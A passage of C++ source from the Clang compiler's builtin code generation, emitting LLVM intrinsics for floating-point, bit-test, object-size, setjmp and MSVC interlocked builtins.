Value *Value = CGF.EmitScalarExpr(E->getArg(1));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits StoreSize = CGF.getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy =
llvm::IntegerType::get(CGF.getLLVMContext(), StoreSize.getQuantity() * 8);
Ptr = CGF.Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::StoreInst *Store =
CGF.Builder.CreateAlignedStore(Value, Ptr, StoreSize);
Store->setVolatile(true);
return Store;
}
// Emit a simple mangled intrinsic that has 1 argument and a return type
// matching the argument type. Depending on mode, this may be a constrained
// floating-point intrinsic.
static Value *emitUnaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, Src0);
}
}
// Emit an intrinsic that has 2 operands of the same type as its result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitBinaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0, Src1 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1 });
}
}
// Emit an intrinsic that has 3 operands of the same type as its result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitTernaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = CGF.EmitScalarExpr(E->getArg(2));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0, Src1, Src2 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1, Src2 });
}
}
// Emit an intrinsic where all operands are of the same type as the result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitCallMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID,
llvm::Type *Ty,
ArrayRef<Value *> Args) {
Function *F;
if (CGF.Builder.getIsFPConstrained())
F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Ty);
else
F = CGF.CGM.getIntrinsic(IntrinsicID, Ty);
if (CGF.Builder.getIsFPConstrained())
return CGF.Builder.CreateConstrainedFPCall(F, Args);
else
return CGF.Builder.CreateCall(F, Args);
}
// Emit a simple mangled intrinsic that has 1 argument and a return type
// matching the argument type.
static Value *emitUnaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, Src0);
}
// Emit an intrinsic that has 2 operands of the same type as its result.
static Value *emitBinaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1 });
}
// Emit an intrinsic that has 3 operands of the same type as its result.
static Value *emitTernaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = CGF.EmitScalarExpr(E->getArg(2));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1, Src2 });
}
// Emit an intrinsic that has 1 float or double operand, and 1 integer.
static Value *emitFPIntBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, {Src0, Src1});
}
// Emit an intrinsic that has overloaded integer result and fp operand.
static Value *
emitMaybeConstrainedFPToIntRoundBuiltin(CodeGenFunction &CGF, const CallExpr *E,
unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Type *ResultType = CGF.ConvertType(E->getType());
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID,
{ResultType, Src0->getType()});
return CGF.Builder.CreateConstrainedFPCall(F, {Src0});
} else {
Function *F =
CGF.CGM.getIntrinsic(IntrinsicID, {ResultType, Src0->getType()});
return CGF.Builder.CreateCall(F, Src0);
}
}
/// EmitFAbs - Emit a call to @llvm.fabs().
static Value *EmitFAbs(CodeGenFunction &CGF, Value *V) {
Function *F = CGF.CGM.getIntrinsic(Intrinsic::fabs, V->getType());
llvm::CallInst *Call = CGF.Builder.CreateCall(F, V);
Call->setDoesNotAccessMemory();
return Call;
}
/// Emit the computation of the sign bit for a floating point value. Returns
/// the i1 sign bit value.
static Value *EmitSignBit(CodeGenFunction &CGF, Value *V) {
LLVMContext &C = CGF.CGM.getLLVMContext();
llvm::Type *Ty = V->getType();
int Width = Ty->getPrimitiveSizeInBits();
llvm::Type *IntTy = llvm::IntegerType::get(C, Width);
V = CGF.Builder.CreateBitCast(V, IntTy);
if (Ty->isPPC_FP128Ty()) {
// We want the sign bit of the higher-order double. The bitcast we just
// did works as if the double-double was stored to memory and then
// read as an i128. The "store" will put the higher-order double in the
// lower address in both little- and big-Endian modes, but the "load"
// will treat those bits as a different part of the i128: the low bits in
// little-Endian, the high bits in big-Endian. Therefore, on big-Endian
// we need to shift the high bits down to the low before truncating.
Width >>= 1;
if (CGF.getTarget().isBigEndian()) {
Value *ShiftCst = llvm::ConstantInt::get(IntTy, Width);
V = CGF.Builder.CreateLShr(V, ShiftCst);
}
// We are truncating value in order to extract the higher-order
// double, which we will be using to extract the sign from.
IntTy = llvm::IntegerType::get(C, Width);
V = CGF.Builder.CreateTrunc(V, IntTy);
}
Value *Zero = llvm::Constant::getNullValue(IntTy);
return CGF.Builder.CreateICmpSLT(V, Zero);
}
static RValue emitLibraryCall(CodeGenFunction &CGF, const FunctionDecl *FD,
const CallExpr *E, llvm::Constant *calleeValue) {
CGCallee callee = CGCallee::forDirect(calleeValue, GlobalDecl(FD));
return CGF.EmitCall(E->getCallee()->getType(), callee, E, ReturnValueSlot());
}
/// Emit a call to llvm.{sadd,uadd,ssub,usub,smul,umul}.with.overflow.*
/// depending on IntrinsicID.
///
/// \arg CGF The current codegen function.
/// \arg IntrinsicID The ID for the Intrinsic we wish to generate.
/// \arg X The first argument to the llvm.*.with.overflow.*.
/// \arg Y The second argument to the llvm.*.with.overflow.*.
/// \arg Carry The carry returned by the llvm.*.with.overflow.*.
/// \returns The result (i.e. sum/product) returned by the intrinsic.
static llvm::Value *EmitOverflowIntrinsic(CodeGenFunction &CGF,
const llvm::Intrinsic::ID IntrinsicID,
llvm::Value *X, llvm::Value *Y,
llvm::Value *&Carry) {
// Make sure we have integers of the same width.
assert(X->getType() == Y->getType() &&
"Arguments must be the same type. (Did you forget to make sure both "
"arguments have the same integer width?)");
Function *Callee = CGF.CGM.getIntrinsic(IntrinsicID, X->getType());
llvm::Value *Tmp = CGF.Builder.CreateCall(Callee, {X, Y});
Carry = CGF.Builder.CreateExtractValue(Tmp, 1);
return CGF.Builder.CreateExtractValue(Tmp, 0);
}
static Value *emitRangedBuiltin(CodeGenFunction &CGF,
unsigned IntrinsicID,
int low, int high) {
llvm::MDBuilder MDHelper(CGF.getLLVMContext());
llvm::MDNode *RNode = MDHelper.createRange(APInt(32, low), APInt(32, high));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, {});
llvm::Instruction *Call = CGF.Builder.CreateCall(F);
Call->setMetadata(llvm::LLVMContext::MD_range, RNode);
return Call;
}
namespace {
struct WidthAndSignedness {
unsigned Width;
bool Signed;
};
}
static WidthAndSignedness
getIntegerWidthAndSignedness(const clang::ASTContext &context,
const clang::QualType Type) {
assert(Type->isIntegerType() && "Given type is not an integer.");
unsigned Width = Type->isBooleanType() ? 1
: Type->isExtIntType() ? context.getIntWidth(Type)
: context.getTypeInfo(Type).Width;
bool Signed = Type->isSignedIntegerType();
return {Width, Signed};
}
// Given one or more integer types, this function produces an integer type that
// encompasses them: any value in one of the given types could be expressed in
// the encompassing type.
static struct WidthAndSignedness
EncompassingIntegerType(ArrayRef<struct WidthAndSignedness> Types) {
assert(Types.size() > 0 && "Empty list of types.");
// If any of the given types is signed, we must return a signed type.
bool Signed = false;
for (const auto &Type : Types) {
Signed |= Type.Signed;
}
// The encompassing type must have a width greater than or equal to the width
// of the specified types. Additionally, if the encompassing type is signed,
// its width must be strictly greater than the width of any unsigned types
// given.
unsigned Width = 0;
for (const auto &Type : Types) {
unsigned MinWidth = Type.Width + (Signed && !Type.Signed);
if (Width < MinWidth) {
Width = MinWidth;
}
}
return {Width, Signed};
}
Value *CodeGenFunction::EmitVAStartEnd(Value *ArgValue, bool IsStart) {
llvm::Type *DestType = Int8PtrTy;
if (ArgValue->getType() != DestType)
ArgValue =
Builder.CreateBitCast(ArgValue, DestType, ArgValue->getName().data());
Intrinsic::ID inst = IsStart ? Intrinsic::vastart : Intrinsic::vaend;
return Builder.CreateCall(CGM.getIntrinsic(inst), ArgValue);
}
/// Checks if using the result of __builtin_object_size(p, @p From) in place of
/// __builtin_object_size(p, @p To) is correct
static bool areBOSTypesCompatible(int From, int To) {
// Note: Our __builtin_object_size implementation currently treats Type=0 and
// Type=2 identically. Encoding this implementation detail here may make
// improving __builtin_object_size difficult in the future, so it's omitted.
return From == To || (From == 0 && To == 1) || (From == 3 && To == 2);
}
static llvm::Value *
getDefaultBuiltinObjectSizeResult(unsigned Type, llvm::IntegerType *ResType) {
return ConstantInt::get(ResType, (Type & 2) ? 0 : -1, /*isSigned=*/true);
}
llvm::Value *
CodeGenFunction::evaluateOrEmitBuiltinObjectSize(const Expr *E, unsigned Type,
llvm::IntegerType *ResType,
llvm::Value *EmittedE,
bool IsDynamic) {
uint64_t ObjectSize;
if (!E->tryEvaluateObjectSize(ObjectSize, getContext(), Type))
return emitBuiltinObjectSize(E, Type, ResType, EmittedE, IsDynamic);
return ConstantInt::get(ResType, ObjectSize, /*isSigned=*/true);
}
/// Returns a Value corresponding to the size of the given expression.
/// This Value may be either of the following:
/// - A llvm::Argument (if E is a param with the pass_object_size attribute on
/// it)
/// - A call to the @llvm.objectsize intrinsic
///
/// EmittedE is the result of emitting `E` as a scalar expr. If it's non-null
/// and we wouldn't otherwise try to reference a pass_object_size parameter,
/// we'll call @llvm.objectsize on EmittedE, rather than emitting E.
llvm::Value *
CodeGenFunction::emitBuiltinObjectSize(const Expr *E, unsigned Type,
llvm::IntegerType *ResType,
llvm::Value *EmittedE, bool IsDynamic) {
// We need to reference an argument if the pointer is a parameter with the
// pass_object_size attribute.
if (auto *D = dyn_cast<DeclRefExpr>(E->IgnoreParenImpCasts())) {
auto *Param = dyn_cast<ParmVarDecl>(D->getDecl());
auto *PS = D->getDecl()->getAttr<PassObjectSizeAttr>();
if (Param != nullptr && PS != nullptr &&
areBOSTypesCompatible(PS->getType(), Type)) {
auto Iter = SizeArguments.find(Param);
assert(Iter != SizeArguments.end());
const ImplicitParamDecl *D = Iter->second;
auto DIter = LocalDeclMap.find(D);
assert(DIter != LocalDeclMap.end());
return EmitLoadOfScalar(DIter->second, /*Volatile=*/false,
getContext().getSizeType(), E->getBeginLoc());
}
}
// LLVM can't handle Type=3 appropriately, and __builtin_object_size shouldn't
// evaluate E for side-effects. In either case, we shouldn't lower to
// @llvm.objectsize.
if (Type == 3 || (!EmittedE && E->HasSideEffects(getContext())))
return getDefaultBuiltinObjectSizeResult(Type, ResType);
Value *Ptr = EmittedE ? EmittedE : EmitScalarExpr(E);
assert(Ptr->getType()->isPointerTy() &&
"Non-pointer passed to __builtin_object_size?");
Function *F =
CGM.getIntrinsic(Intrinsic::objectsize, {ResType, Ptr->getType()});
// LLVM only supports 0 and 2, make sure that we pass along that as a boolean.
Value *Min = Builder.getInt1((Type & 2) != 0);
// For GCC compatibility, __builtin_object_size treat NULL as unknown size.
Value *NullIsUnknown = Builder.getTrue();
Value *Dynamic = Builder.getInt1(IsDynamic);
return Builder.CreateCall(F, {Ptr, Min, NullIsUnknown, Dynamic});
}
namespace {
/// A struct to generically describe a bit test intrinsic.
struct BitTest {
enum ActionKind : uint8_t { TestOnly, Complement, Reset, Set };
enum InterlockingKind : uint8_t {
Unlocked,
Sequential,
Acquire,
Release,
NoFence
};
ActionKind Action;
InterlockingKind Interlocking;
bool Is64Bit;
static BitTest decodeBitTestBuiltin(unsigned BuiltinID);
};
} // namespace
BitTest BitTest::decodeBitTestBuiltin(unsigned BuiltinID) {
switch (BuiltinID) {
// Main portable variants.
case Builtin::BI_bittest:
return {TestOnly, Unlocked, false};
case Builtin::BI_bittestandcomplement:
return {Complement, Unlocked, false};
case Builtin::BI_bittestandreset:
return {Reset, Unlocked, false};
case Builtin::BI_bittestandset:
return {Set, Unlocked, false};
case Builtin::BI_interlockedbittestandreset:
return {Reset, Sequential, false};
case Builtin::BI_interlockedbittestandset:
return {Set, Sequential, false};
// X86-specific 64-bit variants.
case Builtin::BI_bittest64:
return {TestOnly, Unlocked, true};
case Builtin::BI_bittestandcomplement64:
return {Complement, Unlocked, true};
case Builtin::BI_bittestandreset64:
return {Reset, Unlocked, true};
case Builtin::BI_bittestandset64:
return {Set, Unlocked, true};
case Builtin::BI_interlockedbittestandreset64:
return {Reset, Sequential, true};
case Builtin::BI_interlockedbittestandset64:
return {Set, Sequential, true};
// ARM/AArch64-specific ordering variants.
case Builtin::BI_interlockedbittestandset_acq:
return {Set, Acquire, false};
case Builtin::BI_interlockedbittestandset_rel:
return {Set, Release, false};
case Builtin::BI_interlockedbittestandset_nf:
return {Set, NoFence, false};
case Builtin::BI_interlockedbittestandreset_acq:
return {Reset, Acquire, false};
case Builtin::BI_interlockedbittestandreset_rel:
return {Reset, Release, false};
case Builtin::BI_interlockedbittestandreset_nf:
return {Reset, NoFence, false};
}
llvm_unreachable("expected only bittest intrinsics");
}
static char bitActionToX86BTCode(BitTest::ActionKind A) {
switch (A) {
case BitTest::TestOnly: return '\0';
case BitTest::Complement: return 'c';
case BitTest::Reset: return 'r';
case BitTest::Set: return 's';
}
llvm_unreachable("invalid action");
}
static llvm::Value *EmitX86BitTestIntrinsic(CodeGenFunction &CGF,
BitTest BT,
const CallExpr *E, Value *BitBase,
Value *BitPos) {
char Action = bitActionToX86BTCode(BT.Action);
char SizeSuffix = BT.Is64Bit ? 'q' : 'l';
// Build the assembly.
SmallString<64> Asm;
raw_svector_ostream AsmOS(Asm);
if (BT.Interlocking != BitTest::Unlocked)
AsmOS << "lock ";
AsmOS << "bt";
if (Action)
AsmOS << Action;
AsmOS << SizeSuffix << " $2, ($1)";
// Build the constraints. FIXME: We should support immediates when possible.
std::string Constraints = "={@ccc},r,r,~{cc},~{memory}";
std::string MachineClobbers = CGF.getTarget().getClobbers();
if (!MachineClobbers.empty()) {
Constraints += ',';
Constraints += MachineClobbers;
}
llvm::IntegerType *IntType = llvm::IntegerType::get(
CGF.getLLVMContext(),
CGF.getContext().getTypeSize(E->getArg(1)->getType()));
llvm::Type *IntPtrType = IntType->getPointerTo();
llvm::FunctionType *FTy =
llvm::FunctionType::get(CGF.Int8Ty, {IntPtrType, IntType}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
return CGF.Builder.CreateCall(IA, {BitBase, BitPos});
}
static llvm::AtomicOrdering
getBitTestAtomicOrdering(BitTest::InterlockingKind I) {
switch (I) {
case BitTest::Unlocked: return llvm::AtomicOrdering::NotAtomic;
case BitTest::Sequential: return llvm::AtomicOrdering::SequentiallyConsistent;
case BitTest::Acquire: return llvm::AtomicOrdering::Acquire;
case BitTest::Release: return llvm::AtomicOrdering::Release;
case BitTest::NoFence: return llvm::AtomicOrdering::Monotonic;
}
llvm_unreachable("invalid interlocking");
}
/// Emit a _bittest* intrinsic. These intrinsics take a pointer to an array of
/// bits and a bit position and read and optionally modify the bit at that
/// position. The position index can be arbitrarily large, i.e. it can be larger
/// than 31 or 63, so we need an indexed load in the general case.
static llvm::Value *EmitBitTestIntrinsic(CodeGenFunction &CGF,
unsigned BuiltinID,
const CallExpr *E) {
Value *BitBase = CGF.EmitScalarExpr(E->getArg(0));
Value *BitPos = CGF.EmitScalarExpr(E->getArg(1));
BitTest BT = BitTest::decodeBitTestBuiltin(BuiltinID);
// X86 has special BT, BTC, BTR, and BTS instructions that handle the array
// indexing operation internally. Use them if possible.
if (CGF.getTarget().getTriple().isX86())
return EmitX86BitTestIntrinsic(CGF, BT, E, BitBase, BitPos);
// Otherwise, use generic code to load one byte and test the bit. Use all but
// the bottom three bits as the array index, and the bottom three bits to form
// a mask.
// Bit = BitBaseI8[BitPos >> 3] & (1 << (BitPos & 0x7)) != 0;
Value *ByteIndex = CGF.Builder.CreateAShr(
BitPos, llvm::ConstantInt::get(BitPos->getType(), 3), "bittest.byteidx");
Value *BitBaseI8 = CGF.Builder.CreatePointerCast(BitBase, CGF.Int8PtrTy);
Address ByteAddr(CGF.Builder.CreateInBoundsGEP(CGF.Int8Ty, BitBaseI8,
ByteIndex, "bittest.byteaddr"),
CharUnits::One());
Value *PosLow =
CGF.Builder.CreateAnd(CGF.Builder.CreateTrunc(BitPos, CGF.Int8Ty),
llvm::ConstantInt::get(CGF.Int8Ty, 0x7));
// The updating instructions will need a mask.
Value *Mask = nullptr;
if (BT.Action != BitTest::TestOnly) {
Mask = CGF.Builder.CreateShl(llvm::ConstantInt::get(CGF.Int8Ty, 1), PosLow,
"bittest.mask");
}
// Check the action and ordering of the interlocked intrinsics.
llvm::AtomicOrdering Ordering = getBitTestAtomicOrdering(BT.Interlocking);
Value *OldByte = nullptr;
if (Ordering != llvm::AtomicOrdering::NotAtomic) {
// Emit a combined atomicrmw load/store operation for the interlocked
// intrinsics.
llvm::AtomicRMWInst::BinOp RMWOp = llvm::AtomicRMWInst::Or;
if (BT.Action == BitTest::Reset) {
Mask = CGF.Builder.CreateNot(Mask);
RMWOp = llvm::AtomicRMWInst::And;
}
OldByte = CGF.Builder.CreateAtomicRMW(RMWOp, ByteAddr.getPointer(), Mask,
Ordering);
} else {
// Emit a plain load for the non-interlocked intrinsics.
OldByte = CGF.Builder.CreateLoad(ByteAddr, "bittest.byte");
Value *NewByte = nullptr;
switch (BT.Action) {
case BitTest::TestOnly:
// Don't store anything.
break;
case BitTest::Complement:
NewByte = CGF.Builder.CreateXor(OldByte, Mask);
break;
case BitTest::Reset:
NewByte = CGF.Builder.CreateAnd(OldByte, CGF.Builder.CreateNot(Mask));
break;
case BitTest::Set:
NewByte = CGF.Builder.CreateOr(OldByte, Mask);
break;
}
if (NewByte)
CGF.Builder.CreateStore(NewByte, ByteAddr);
}
// However we loaded the old byte, either by plain load or atomicrmw, shift
// the bit into the low position and mask it to 0 or 1.
Value *ShiftedByte = CGF.Builder.CreateLShr(OldByte, PosLow, "bittest.shr");
return CGF.Builder.CreateAnd(
ShiftedByte, llvm::ConstantInt::get(CGF.Int8Ty, 1), "bittest.res");
}
static llvm::Value *emitPPCLoadReserveIntrinsic(CodeGenFunction &CGF,
unsigned BuiltinID,
const CallExpr *E) {
Value *Addr = CGF.EmitScalarExpr(E->getArg(0));
SmallString<64> Asm;
raw_svector_ostream AsmOS(Asm);
llvm::IntegerType *RetType = CGF.Int32Ty;
switch (BuiltinID) {
case clang::PPC::BI__builtin_ppc_ldarx:
AsmOS << "ldarx ";
RetType = CGF.Int64Ty;
break;
case clang::PPC::BI__builtin_ppc_lwarx:
AsmOS << "lwarx ";
RetType = CGF.Int32Ty;
break;
case clang::PPC::BI__builtin_ppc_lharx:
AsmOS << "lharx ";
RetType = CGF.Int16Ty;
break;
case clang::PPC::BI__builtin_ppc_lbarx:
AsmOS << "lbarx ";
RetType = CGF.Int8Ty;
break;
default:
llvm_unreachable("Expected only PowerPC load reserve intrinsics");
}
AsmOS << "$0, ${1:y}";
std::string Constraints = "=r,*Z,~{memory}";
std::string MachineClobbers = CGF.getTarget().getClobbers();
if (!MachineClobbers.empty()) {
Constraints += ',';
Constraints += MachineClobbers;
}
llvm::Type *IntPtrType = RetType->getPointerTo();
llvm::FunctionType *FTy =
llvm::FunctionType::get(RetType, {IntPtrType}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
return CGF.Builder.CreateCall(IA, {Addr});
}
namespace {
enum class MSVCSetJmpKind {
_setjmpex,
_setjmp3,
_setjmp
};
}
/// MSVC handles setjmp a bit differently on different platforms. On every
/// architecture except 32-bit x86, the frame address is passed. On x86, extra
/// parameters can be passed as variadic arguments, but we always pass none.
static RValue EmitMSVCRTSetJmp(CodeGenFunction &CGF, MSVCSetJmpKind SJKind,
const CallExpr *E) {
llvm::Value *Arg1 = nullptr;
llvm::Type *Arg1Ty = nullptr;
StringRef Name;
bool IsVarArg = false;
if (SJKind == MSVCSetJmpKind::_setjmp3) {
Name = "_setjmp3";
Arg1Ty = CGF.Int32Ty;
Arg1 = llvm::ConstantInt::get(CGF.IntTy, 0);
IsVarArg = true;
} else {
Name = SJKind == MSVCSetJmpKind::_setjmp ? "_setjmp" : "_setjmpex";
Arg1Ty = CGF.Int8PtrTy;
if (CGF.getTarget().getTriple().getArch() == llvm::Triple::aarch64) {
Arg1 = CGF.Builder.CreateCall(
CGF.CGM.getIntrinsic(Intrinsic::sponentry, CGF.AllocaInt8PtrTy));
} else
Arg1 = CGF.Builder.CreateCall(
CGF.CGM.getIntrinsic(Intrinsic::frameaddress, CGF.AllocaInt8PtrTy),
llvm::ConstantInt::get(CGF.Int32Ty, 0));
}
// Mark the call site and declaration with ReturnsTwice.
llvm::Type *ArgTypes[2] = {CGF.Int8PtrTy, Arg1Ty};
llvm::AttributeList ReturnsTwiceAttr = llvm::AttributeList::get(
CGF.getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::ReturnsTwice);
llvm::FunctionCallee SetJmpFn = CGF.CGM.CreateRuntimeFunction(
llvm::FunctionType::get(CGF.IntTy, ArgTypes, IsVarArg), Name,
ReturnsTwiceAttr, /*Local=*/true);
llvm::Value *Buf = CGF.Builder.CreateBitOrPointerCast(
CGF.EmitScalarExpr(E->getArg(0)), CGF.Int8PtrTy);
llvm::Value *Args[] = {Buf, Arg1};
llvm::CallBase *CB = CGF.EmitRuntimeCallOrInvoke(SetJmpFn, Args);
CB->setAttributes(ReturnsTwiceAttr);
return RValue::get(CB);
}
// Many of MSVC builtins are on x64, ARM and AArch64; to avoid repeating code,
// we handle them here.
enum class CodeGenFunction::MSVCIntrin {
_BitScanForward,
_BitScanReverse,
_InterlockedAnd,
_InterlockedDecrement,
_InterlockedExchange,
_InterlockedExchangeAdd,
_InterlockedExchangeSub,
_InterlockedIncrement,
_InterlockedOr,
_InterlockedXor,
_InterlockedExchangeAdd_acq,
_InterlockedExchangeAdd_rel,
_InterlockedExchangeAdd_nf,
_InterlockedExchange_acq,
_InterlockedExchange_rel,
_InterlockedExchange_nf,
_InterlockedCompareExchange_acq,
_InterlockedCompareExchange_rel,
_InterlockedCompareExchange_nf,
_InterlockedCompareExchange128,
_InterlockedCompareExchange128_acq,
_InterlockedCompareExchange128_rel,
_InterlockedCompareExchange128_nf,
_InterlockedOr_acq,
_InterlockedOr_rel,
_InterlockedOr_nf,
_InterlockedXor_acq,
_InterlockedXor_rel,
_InterlockedXor_nf,
_InterlockedAnd_acq,
_InterlockedAnd_rel,
_InterlockedAnd_nf,
_InterlockedIncrement_acq,
_InterlockedIncrement_rel,
_InterlockedIncrement_nf,
_InterlockedDecrement_acq,
_InterlockedDecrement_rel,
_InterlockedDecrement_nf,
__fastfail,
};
static Optional<CodeGenFunction::MSVCIntrin>
translateArmToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case ARM::BI_BitScanForward:
case ARM::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case ARM::BI_BitScanReverse:
case ARM::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case ARM::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case ARM::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case ARM::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case ARM::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case ARM::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case ARM::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case ARM::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case ARM::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
case ARM::BI_InterlockedExchangeAdd8_acq:
case ARM::BI_InterlockedExchangeAdd16_acq:
case ARM::BI_InterlockedExchangeAdd_acq:
case ARM::BI_InterlockedExchangeAdd64_acq:
return MSVCIntrin::_InterlockedExchangeAdd_acq;
case ARM::BI_InterlockedExchangeAdd8_rel:
case ARM::BI_InterlockedExchangeAdd16_rel:
case ARM::BI_InterlockedExchangeAdd_rel:
case ARM::BI_InterlockedExchangeAdd64_rel:
return MSVCIntrin::_InterlockedExchangeAdd_rel;
case ARM::BI_InterlockedExchangeAdd8_nf:
case ARM::BI_InterlockedExchangeAdd16_nf:
case ARM::BI_InterlockedExchangeAdd_nf:
case ARM::BI_InterlockedExchangeAdd64_nf:
return MSVCIntrin::_InterlockedExchangeAdd_nf;
case ARM::BI_InterlockedExchange8_acq:
case ARM::BI_InterlockedExchange16_acq:
case ARM::BI_InterlockedExchange_acq:
case ARM::BI_InterlockedExchange64_acq:
return MSVCIntrin::_InterlockedExchange_acq;
case ARM::BI_InterlockedExchange8_rel:
case ARM::BI_InterlockedExchange16_rel:
case ARM::BI_InterlockedExchange_rel:
case ARM::BI_InterlockedExchange64_rel:
return MSVCIntrin::_InterlockedExchange_rel;
case ARM::BI_InterlockedExchange8_nf:
case ARM::BI_InterlockedExchange16_nf:
case ARM::BI_InterlockedExchange_nf:
case ARM::BI_InterlockedExchange64_nf:
return MSVCIntrin::_InterlockedExchange_nf;
case ARM::BI_InterlockedCompareExchange8_acq:
case ARM::BI_InterlockedCompareExchange16_acq:
case ARM::BI_InterlockedCompareExchange_acq:
case ARM::BI_InterlockedCompareExchange64_acq:
return MSVCIntrin::_InterlockedCompareExchange_acq;
case ARM::BI_InterlockedCompareExchange8_rel:
case ARM::BI_InterlockedCompareExchange16_rel:
case ARM::BI_InterlockedCompareExchange_rel:
case ARM::BI_InterlockedCompareExchange64_rel:
return MSVCIntrin::_InterlockedCompareExchange_rel;
case ARM::BI_InterlockedCompareExchange8_nf:
case ARM::BI_InterlockedCompareExchange16_nf:
case ARM::BI_InterlockedCompareExchange_nf:
case ARM::BI_InterlockedCompareExchange64_nf:
return MSVCIntrin::_InterlockedCompareExchange_nf;
case ARM::BI_InterlockedOr8_acq:
case ARM::BI_InterlockedOr16_acq:
case ARM::BI_InterlockedOr_acq:
case ARM::BI_InterlockedOr64_acq:
return MSVCIntrin::_InterlockedOr_acq;
case ARM::BI_InterlockedOr8_rel:
case ARM::BI_InterlockedOr16_rel:
case ARM::BI_InterlockedOr_rel:
case ARM::BI_InterlockedOr64_rel:
return MSVCIntrin::_InterlockedOr_rel;
case ARM::BI_InterlockedOr8_nf:
case ARM::BI_InterlockedOr16_nf:
case ARM::BI_InterlockedOr_nf:
case ARM::BI_InterlockedOr64_nf:
return MSVCIntrin::_InterlockedOr_nf;
case ARM::BI_InterlockedXor8_acq:
case ARM::BI_InterlockedXor16_acq:
case ARM::BI_InterlockedXor_acq:
case ARM::BI_InterlockedXor64_acq:
return MSVCIntrin::_InterlockedXor_acq;
case ARM::BI_InterlockedXor8_rel:
case ARM::BI_InterlockedXor16_rel:
case ARM::BI_InterlockedXor_rel:
case ARM::BI_InterlockedXor64_rel:
